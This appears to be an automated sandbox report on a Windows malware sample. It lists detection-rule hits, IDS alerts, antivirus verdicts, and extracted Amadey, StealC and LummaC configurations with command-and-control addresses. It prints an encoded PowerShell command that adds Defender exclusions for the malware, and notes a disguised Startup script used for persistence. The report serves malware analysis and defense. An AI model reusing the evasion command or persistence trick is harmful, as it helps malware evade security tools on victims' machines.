QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBN
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs" , ProcessId: 3812, ProcessName: wscript.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe, ParentProcessId: 1748, ParentProcessName: Fwkdsz.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBN
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2044, ProcessName: svchost.exe

                          Data Obfuscation

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe, ProcessId: 1748, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:19.674142+010020283713Unknown Traffic192.168.2.463854188.114.96.3443TCP
                          2024-11-02T07:16:21.066251+010020283713Unknown Traffic192.168.2.463867188.114.96.3443TCP
                          2024-11-02T07:16:22.674369+010020283713Unknown Traffic192.168.2.463873188.114.96.3443TCP
                          2024-11-02T07:16:24.217434+010020283713Unknown Traffic192.168.2.463884188.114.96.3443TCP
                          2024-11-02T07:16:26.239491+010020283713Unknown Traffic192.168.2.463896188.114.96.3443TCP
                          2024-11-02T07:16:29.325555+010020283713Unknown Traffic192.168.2.463909188.114.96.3443TCP
                          2024-11-02T07:16:31.633056+010020283713Unknown Traffic192.168.2.463923188.114.96.3443TCP
                          2024-11-02T07:16:38.765975+010020283713Unknown Traffic192.168.2.463970188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:20.299336+010020546531A Network Trojan was detected192.168.2.463854188.114.96.3443TCP
                          2024-11-02T07:16:21.767257+010020546531A Network Trojan was detected192.168.2.463867188.114.96.3443TCP
                          2024-11-02T07:16:39.228519+010020546531A Network Trojan was detected192.168.2.463970188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:20.299336+010020498361A Network Trojan was detected192.168.2.463854188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:21.767257+010020498121A Network Trojan was detected192.168.2.463867188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:19.674142+010020571241Domain Observed Used for C2 Detected192.168.2.463854188.114.96.3443TCP
                          2024-11-02T07:16:21.066251+010020571241Domain Observed Used for C2 Detected192.168.2.463867188.114.96.3443TCP
                          2024-11-02T07:16:22.674369+010020571241Domain Observed Used for C2 Detected192.168.2.463873188.114.96.3443TCP
                          2024-11-02T07:16:24.217434+010020571241Domain Observed Used for C2 Detected192.168.2.463884188.114.96.3443TCP
                          2024-11-02T07:16:26.239491+010020571241Domain Observed Used for C2 Detected192.168.2.463896188.114.96.3443TCP
                          2024-11-02T07:16:29.325555+010020571241Domain Observed Used for C2 Detected192.168.2.463909188.114.96.3443TCP
                          2024-11-02T07:16:31.633056+010020571241Domain Observed Used for C2 Detected192.168.2.463923188.114.96.3443TCP
                          2024-11-02T07:16:38.765975+010020571241Domain Observed Used for C2 Detected192.168.2.463970188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:40.185875+010020197142Potentially Bad Traffic192.168.2.463979185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:20.309414+010020446961A Network Trojan was detected192.168.2.463856185.215.113.4380TCP
                          2024-11-02T07:16:26.522216+010020446961A Network Trojan was detected192.168.2.463895185.215.113.4380TCP
                          2024-11-02T07:16:33.062501+010020446961A Network Trojan was detected192.168.2.463931185.215.113.4380TCP
                          2024-11-02T07:16:44.068170+010020446961A Network Trojan was detected192.168.2.464006185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:18.940561+010020571291Domain Observed Used for C2 Detected192.168.2.4540871.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:18.952164+010020571271Domain Observed Used for C2 Detected192.168.2.4563711.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:19.017132+010020571231Domain Observed Used for C2 Detected192.168.2.4596451.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:18.925304+010020571311Domain Observed Used for C2 Detected192.168.2.4508681.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:18.963214+010020571251Domain Observed Used for C2 Detected192.168.2.4552651.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:29.952069+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.463908TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:29.937001+010020442441Malware Command and Control Activity Detected192.168.2.463908185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:30.235267+010020442461Malware Command and Control Activity Detected192.168.2.463908185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:31.434601+010020442481Malware Command and Control Activity Detected192.168.2.463908185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:30.255276+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.463908TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:23.351438+010020480941Malware Command and Control Activity Detected192.168.2.463873188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:29.638691+010020442431Malware Command and Control Activity Detected192.168.2.463908185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:12.728113+010028561211A Network Trojan was detected192.168.2.463813185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:05.735472+010028561471A Network Trojan was detected192.168.2.463773185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:11.766943+010028561221A Network Trojan was detected185.215.113.4380192.168.2.463787TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:09.037886+010028033053Unknown Traffic192.168.2.463794208.109.77.11680TCP
                          2024-11-02T07:16:13.854592+010028033053Unknown Traffic192.168.2.463819185.215.113.1680TCP
                          2024-11-02T07:16:21.270569+010028033053Unknown Traffic192.168.2.463862185.215.113.1680TCP
                          2024-11-02T07:16:27.760726+010028033053Unknown Traffic192.168.2.463898185.215.113.1680TCP
                          2024-11-02T07:16:34.038855+010028033053Unknown Traffic192.168.2.463937185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-02T07:16:32.035833+010028033043Unknown Traffic192.168.2.463908185.215.113.20680TCP
                          2024-11-02T07:16:55.283955+010028033043Unknown Traffic192.168.2.464038185.215.113.20680TCP
                          2024-11-02T07:16:58.862023+010028033043Unknown Traffic192.168.2.464038185.215.113.20680TCP
                          2024-11-02T07:17:00.858615+010028033043Unknown Traffic192.168.2.464038185.215.113.20680TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Roaming\DiagTrack.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: 00000001.00000002.1734062990.00000000004B1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 13.2.0d8313073f.exe.610000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                          Source: 24da741fb6.exe.1236.11.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "navygenerayk.store", "fadehairucw.store", "necklacedmny.store", "crisiwarny.store", "scriptyprefej.store", "presticitpo.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fwkdsz[1].exeReversingLabs: Detection: 18%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeReversingLabs: Detection: 18%
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeReversingLabs: Detection: 42%
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeReversingLabs: Detection: 36%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                          Source: file.exeReversingLabs: Detection: 52%
                          Source: file.exeVirustotal: Detection: 54%Perma Link
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\DiagTrack.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: INSERT_KEY_HERE
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 30
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 11
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 20
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: 24
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetProcAddress
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: LoadLibraryA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: lstrcatA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: OpenEventA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateEventA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CloseHandle
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Sleep
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetUserDefaultLangID
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: VirtualAllocExNuma
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: VirtualFree
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetSystemInfo
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: VirtualAlloc
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HeapAlloc
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetComputerNameA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: lstrcpyA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetProcessHeap
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetCurrentProcess
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: lstrlenA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ExitProcess
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GlobalMemoryStatusEx
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetSystemTime
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SystemTimeToFileTime
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: advapi32.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: gdi32.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: user32.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: crypt32.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ntdll.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetUserNameA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateDCA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetDeviceCaps
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ReleaseDC
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CryptStringToBinaryA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: sscanf
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: VMwareVMware
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HAL9TH
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: JohnDoe
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DISPLAY
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: %hu/%hu/%hu
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: http://185.215.113.206
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: bksvnsj
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: /6c4adf523b719729.php
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: /746f34465cf17784/
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: tale
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetEnvironmentVariableA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetFileAttributesA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GlobalLock
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: HeapFree
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetFileSize
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GlobalSize
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateToolhelp32Snapshot
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: IsWow64Process
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Process32Next
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetLocalTime
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: FreeLibrary
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetTimeZoneInformation
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetSystemPowerStatus
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetVolumeInformationA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetWindowsDirectoryA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: Process32First
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetLocaleInfoA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetUserDefaultLocaleName
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetModuleFileNameA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DeleteFileA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: FindNextFileA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: LocalFree
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: FindClose
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SetEnvironmentVariableA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: LocalAlloc
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetFileSizeEx
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ReadFile
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SetFilePointer
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: WriteFile
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateFileA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: FindFirstFileA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CopyFileA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: VirtualProtect
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetLastError
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: lstrcpynA
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: MultiByteToWideChar
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GlobalFree
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: WideCharToMultiByte
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GlobalAlloc
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: OpenProcess
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: TerminateProcess
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetCurrentProcessId
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: gdiplus.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: ole32.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: bcrypt.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: wininet.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: shlwapi.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: shell32.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: psapi.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: rstrtmgr.dll
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateCompatibleBitmap
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: SelectObject
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BitBlt
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: DeleteObject
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateCompatibleDC
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdipGetImageEncodersSize
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdipGetImageEncoders
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdiplusStartup
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdiplusShutdown
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdipSaveImageToStream
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdipDisposeImage
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GdipFree
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: GetHGlobalFromStream
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CreateStreamOnHGlobal
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CoUninitialize
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CoInitialize
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: CoCreateInstance
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                          Source: 13.2.0d8313073f.exe.610000.0.unpackString decryptor: BCryptDecrypt
